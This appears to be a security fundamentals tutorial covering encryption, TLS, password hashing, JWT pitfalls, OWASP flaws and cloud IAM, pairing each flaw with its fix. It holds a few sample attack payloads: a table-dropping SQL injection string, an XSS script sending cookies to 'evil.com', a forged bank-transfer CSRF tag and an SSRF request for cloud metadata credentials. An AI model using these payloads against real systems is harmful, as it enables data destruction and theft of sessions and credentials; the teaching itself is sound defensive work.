Security Fundamentals - What Attackers Know That You Might Not // Megha Bose

Helpful context:

In April 2021, a security researcher announced the discovery of 533 million Facebook records - names, phone numbers, Facebook IDs, locations - posted freely on a hacker forum. The data was old, collected in 2019, but the cause was instructive: a mobile API endpoint that allowed phone number lookup had inadequate rate limiting. Attackers enumerated hundreds of millions of phone numbers systematically, scraping the linked profile data for each. No cryptography was broken. No zero-day vulnerability was exploited. A basic operational oversight - an API with no throttle - exposed half a billion users.

This is how most breaches actually work. Not through brilliant cryptographic attacks, but through overlooked rate limits, SQL strings assembled from user input, passwords hashed with MD5, and credentials committed to GitHub. The cryptography is usually fine. The application logic is where things fall apart.

The Threat Model: What You’re Actually Defending Against

Before listing vulnerabilities, it helps to understand who attacks systems and why. The vast majority of attacks are opportunistic and automated. Bots scan the internet continuously for known vulnerable software versions, default credentials, exposed admin panels, and common misconfigurations. A new server with a default password will be compromised within hours.

Targeted attacks are rarer and more sophisticated - a competitor seeking trade secrets, a nation-state targeting critical infrastructure, a disgruntled insider. These are harder to defend against but also affect fewer organizations.

The practical implication: fixing the common, well-documented vulnerabilities eliminates the vast majority of real-world risk. OWASP’s Top 10 has been largely the same list for fifteen years because the same mistakes keep appearing.

Symmetric vs Asymmetric Encryption

Symmetric encryption uses one key for both encryption and decryption. The gold standard is AES-256-GCM: AES (Advanced Encryption Standard) with a 256-bit key, in GCM (Galois/Counter Mode) which provides both confidentiality and integrity. If someone tampers with the ciphertext, decryption fails. This is what encrypts your data at rest, your database backups, and the payload of TLS connections.

The fundamental problem with symmetric encryption: both parties need the same key. How do you exchange a secret key over an insecure channel without an attacker intercepting it? This is where asymmetric encryption comes in.

Asymmetric encryption uses a mathematically linked key pair: a public key and a private key. Anything encrypted with the public key can only be decrypted with the private key. The public key is, by design, public - share it with anyone. The private key never leaves your control.

RSA (Rivest-Shamir-Adleman) is the classical asymmetric algorithm, based on the computational hardness of factoring large integers. A 2048-bit RSA key is considered secure today; 4096-bit for long-term secrets. ECC (Elliptic Curve Cryptography) achieves equivalent security with much shorter keys - a 256-bit ECC key is roughly as secure as a 3072-bit RSA key, with faster operations and smaller certificates.

Asymmetric encryption solves the key exchange problem but is computationally expensive - orders of magnitude slower than AES. This is why TLS uses asymmetric cryptography to establish a shared secret and then switches to symmetric AES for the actual data. The padlock represents this hybrid approach.

The TLS Handshake: What Happens When You See the Padlock

When your browser connects to https://bank.com, here’s what happens before a single byte of your request is sent:

ClientHello: Your browser announces which TLS version it supports (1.3 preferred), which cipher suites it can use, and a random nonce. It also sends a Diffie-Hellman key share.
ServerHello + Certificate: The server responds with its chosen cipher suite, its own DH key share, and its certificate - a document containing the server’s public key, signed by a Certificate Authority (CA).
Certificate verification: Your browser checks the certificate against its built-in trust store (a list of root CAs embedded in your OS or browser). It verifies that the CA’s signature on the certificate is valid, that the certificate hasn’t expired, and that the hostname matches.
Key derivation: Both sides independently compute the same shared secret from the DH key shares (without ever transmitting that secret). They derive symmetric encryption keys from this shared secret.
Encrypted connection: All subsequent traffic is encrypted with AES-256-GCM. The padlock appears.

TLS 1.3 (2018) streamlined this to one round-trip (1-RTT) and eliminated several weak cipher options that had plagued TLS 1.2. It also introduced 0-RTT resumption for returning connections - at the cost of some replay attack risk for non-idempotent requests.

The certificate chain is the trust anchor. Your server’s certificate is signed by an intermediate CA, which is signed by a root CA. If any link is invalid, expired, or revoked, the browser shows a warning. Let’s Encrypt (free, automated certificates) has eliminated the certificate management excuse for running HTTP; AWS ACM (Certificate Manager) handles renewal automatically for resources in your AWS account.

Password Storage: Why Slow Is Good

The naive developer stores passwords in plaintext. A slightly less naive developer hashes them with SHA-256. Both are wrong.

SHA-256 is designed to be fast - billions of hashes per second on modern GPUs. An attacker with your hashed password database can run a dictionary attack: hash every word in a dictionary, every common password, every known leaked password, and compare against your hashes. In 2024, an 8-character password hashed with MD5 can be cracked in seconds.

The fix has two components: salting and slow hashing.

A salt is a random value prepended to the password before hashing. Two users with the same password get different hashes. This defeats precomputed rainbow tables (where an attacker pre-hashes every possible password) because the salt makes every hash unique.

Slow hashing algorithms are intentionally computationally expensive:

bcrypt computes the hash through a configurable number of “rounds” (iterations). Setting rounds=12 means $2^{12} = 4096$ iterations. It runs in ~100ms on a server - imperceptible for a login - but catastrophic for an attacker trying billions of combinations.

Argon2 (winner of the 2015 Password Hashing Competition) goes further. It’s memory-hard: it requires gigabytes of RAM to compute efficiently. GPUs and ASICs designed for fast hashing can’t exploit their parallelism because they run out of memory. Argon2id is the recommended algorithm for new systems.

import bcrypt

# Registration - hashing is slow by design (~100ms at rounds=12)
hashed = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12))
# store 'hashed' in your database - the salt is embedded in the hash string

# Login
def verify_password(plaintext: str, stored_hash: str) -> bool:
    return bcrypt.checkpw(plaintext.encode(), stored_hash.encode())

Never use SHA-1, SHA-256, or MD5 for passwords. They’re cryptographic hash functions designed for speed and data integrity, not for password storage.

Authentication vs Authorization

These two concepts are frequently confused, and the confusion leads to security holes.

Authentication (authn) answers “who are you?” It’s the process of verifying identity. A valid session token, a correct password, a signed JWT, an OAuth token - these are authentication mechanisms. A request that fails authentication gets a 401 Unauthorized response.

Authorization (authz) answers “what are you allowed to do?” It’s checked after authentication. Can user 42 read invoice 9981? Can this service account delete S3 objects? Authorization failures return 403 Forbidden.

The classic bug: an application authenticates the user on login and stores their user ID in a session. It then trusts that user ID to authorize all subsequent requests without re-checking ownership. User 42 requests /invoices/9981. The server fetches invoice 9981 from the database and returns it - without checking whether user 42 owns invoice 9981. This is IDOR: Insecure Direct Object Reference. It’s the most common authorization vulnerability and the reason the OWASP list has “Broken Access Control” at #1.

The fix is always to authorize at the data layer: SELECT * FROM invoices WHERE id = $1 AND owner_id = $2. The user ID must constrain the query, not just be trusted as metadata.

JWT Structure and Pitfalls

A JWT looks like three base64url-encoded sections separated by dots:

eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiI0MiIsImV4cCI6MTcyNTM5MzYwMCwicm9sZSI6ImFkbWluIn0.{sig}

Decode the sections:

Header: {"alg": "RS256", "typ": "JWT"}
Payload: {"sub": "42", "exp": 1725393600, "role": "admin"}
Signature: computed over header + payload using the signing key

The server verifies the signature using its public key (for RS256) or shared secret (for HS256). If valid, it trusts the claims in the payload without a database lookup. This stateless design is what makes JWT attractive for horizontally scaled services.

The alg: none attack: Early JWT libraries honored a token that declared "alg": "none" in the header and omitted the signature. The attacker could forge any claims, declare no algorithm, and the library would accept it. Always explicitly specify the allowed algorithms server-side and never accept none.

Weak secrets: HS256 signed with a guessable secret (common passwords, “secret”, “your-256-bit-secret”) can be brute-forced. Either use a long random secret (32+ bytes) or switch to RS256/ES256 where the signing key is a private key that never needs to be shared.

Missing expiry: A JWT without an exp claim is valid forever. Set short expiry (15 minutes for access tokens), and use refresh tokens - server-side opaque tokens that can be revoked - to issue new access tokens.

Token storage in browsers: Storing JWTs in localStorage exposes them to XSS - any injected script can read localStorage. Storing in httpOnly cookies prevents JavaScript access but introduces CSRF risk. The httpOnly cookie with SameSite=Strict or Lax is generally the safer tradeoff.

OWASP Top 10: The Recurring Failures

SQL Injection

An attacker injects SQL syntax into input fields that gets interpolated into a database query:

# Vulnerable - never do this
query = f"SELECT * FROM users WHERE email = '{user_input}'"
# user_input = "'; DROP TABLE users; --"
# Executes: SELECT * FROM users WHERE email = ''; DROP TABLE users; --'

# Safe - parameterized queries
cursor.execute("SELECT * FROM users WHERE email = %s", (user_input,))

Parameterized queries are the complete fix. The database driver handles escaping - the user input is data, never interpreted as SQL syntax. ORMs use parameterized queries by default, but raw string formatting anywhere in your codebase is a vulnerability regardless of framework.

Cross-Site Scripting (XSS)

An attacker injects JavaScript into your page that executes in other users' browsers, stealing cookies or session tokens:

<!-- If user_comment is: <script>fetch('evil.com?c='+document.cookie)</script> -->
<div>{{ user_comment }}</div>  <!-- rendered without escaping - vulnerable -->

Defenses: escape all user-supplied content in HTML output (< → <, " → "). Use frameworks that auto-escape by default (React, Jinja2 with autoescape enabled). Add a Content Security Policy header that whitelists script sources:

Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'

CSRF (Cross-Site Request Forgery)

A malicious page tricks your browser into making a state-changing request to a site where you’re authenticated:

<!-- On attacker.com -->
<img src="https://bank.com/transfer?to=attacker&amount=1000">

Your browser sends your bank’s session cookie along with this request. The bank sees an authenticated request.

Defenses: SameSite=Strict cookies don’t get sent on cross-origin requests - this alone defeats most CSRF in modern browsers. CSRF tokens (a random value in a hidden form field that the server validates) work even for older browsers.

SSRF (Server-Side Request Forgery)

An attacker tricks your server into making HTTP requests to internal network addresses:

POST /api/fetch-url
{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}

169.254.169.254 is the AWS EC2 Instance Metadata Service. IMDSv1 required no authentication - any code running on the instance could retrieve the IAM credentials attached to that instance. This is how the Capital One breach worked in 2019: a misconfigured WAF on an EC2 instance could be tricked into making SSRF requests, and the IMDS returned IAM credentials with excessive permissions, granting access to 100 million customer records in S3.

IMDSv2 (now the default) requires an initial PUT request to get a session token before any metadata is accessible. This session token is in a response header that SSRF-vulnerable server-side code typically can’t retrieve through simple URL fetch. The defense in application code: validate URLs against an allowlist before fetching them; block requests to RFC 1918 private ranges and the link-local 169.254.x.x range.

Cloud IAM: Least Privilege in Practice

AWS IAM (Identity and Access Management) implements fine-grained authorization for every AWS API call. An IAM policy is a JSON document that specifies which actions are allowed on which resources:

{
  "Effect": "Allow",
  "Action": ["s3:GetObject"],
  "Resource": "arn:aws:s3:::my-bucket/reports/*"
}

Least privilege means every role, user, and service should have only the permissions needed for its function - no more. The Capital One breach exploited an IAM role attached to an EC2 instance that had s3:GetObject permissions on all buckets, not just the ones the service needed.

In practice, IAM policies accumulate over time. Engineers add permissions to unblock work and rarely remove them. AWS IAM Access Analyzer identifies policies that are more permissive than necessary. SCPs (Service Control Policies) in AWS Organizations enforce maximum permission boundaries across an entire account or OU.

Secrets management: Credentials should never live in environment variables baked into container images or committed to configuration files. AWS Secrets Manager and Parameter Store store credentials encrypted at rest and provide IAM-controlled access with automatic rotation. HashiCorp Vault provides vendor-neutral secrets management with dynamic credentials (short-lived secrets generated on-demand and automatically expired).

The Critique: TLS Solved the Wrong Problem

TLS made the internet’s transport layer confidential and authenticated. An eavesdropper between your browser and the server can no longer read your traffic or inject data. This was a genuine achievement.

But TLS does not protect against the attack surface that actually dominates security incidents. SQL injection happens inside the application. XSS affects how your server generates HTML. CSRF exploits browser cookie behavior. IDOR is an authorization logic error. SSRF happens when your server fetches URLs from user input. None of these are transport-layer problems; TLS is entirely irrelevant to all of them.

The “https” padlock has become a misleading signal of trustworthiness. Phishing sites routinely use valid TLS certificates - the padlock just means the connection is encrypted, not that the site is legitimate or that the application is secure.

Future Outlook

Zero-trust networking replaces the perimeter model (trust internal traffic, distrust external) with per-request authentication and authorization for every connection regardless of network location. The assumption is that the network is hostile - even internal. Google’s BeyondCorp, launched internally around 2011, is the canonical implementation. Every access to internal systems requires verifiable credentials and passes through a policy engine, regardless of whether the requester is in a Google office or on public Wi-Fi.

Confidential computing addresses a different threat: protecting data from the cloud provider and its infrastructure. Intel SGX (Software Guard Extensions) and AMD SEV (Secure Encrypted Virtualization) create hardware-enforced enclaves where code runs and data is decrypted only inside isolated CPU memory regions that even the hypervisor can’t read. This enables workloads with sensitive data to run in cloud environments with cryptographic guarantees that the cloud provider cannot access the plaintext.

The shift toward smaller blast radii - short-lived credentials, per-service IAM roles, mTLS between microservices, hardware security modules for key material - reflects the industry’s growing acceptance that breaches are inevitable and the goal is containment.

Concept	Key Point
Symmetric encryption	AES-256-GCM; fast, one key; key distribution is the problem
Asymmetric encryption	RSA / ECC; public key is public; private key never leaves
TLS handshake	DH key exchange → shared secret → symmetric AES; certificate verifies server identity
bcrypt / Argon2	Intentionally slow password hashing; salted; defeats GPU brute force
Authentication vs authorization	authn = who are you; authz = what can you do; 401 vs 403
IDOR	Most common authz bug; always constrain queries by owner ID
SQL injection	Parameterized queries are the complete fix
XSS	Escape output; CSP headers; auto-escaping frameworks
CSRF	SameSite=Strict cookies; CSRF tokens
SSRF	Validate and restrict URLs; IMDSv2 defeats metadata endpoint attacks
JWT pitfalls	`alg:none` attack; weak secrets; missing expiry; storage (httpOnly cookie preferred)
Least privilege	IAM roles get only what they need; Access Analyzer enforces it
Zero-trust	Authenticate every request regardless of network location

Read Next:

Databases & Indexes - The Structures That Make Queries Fast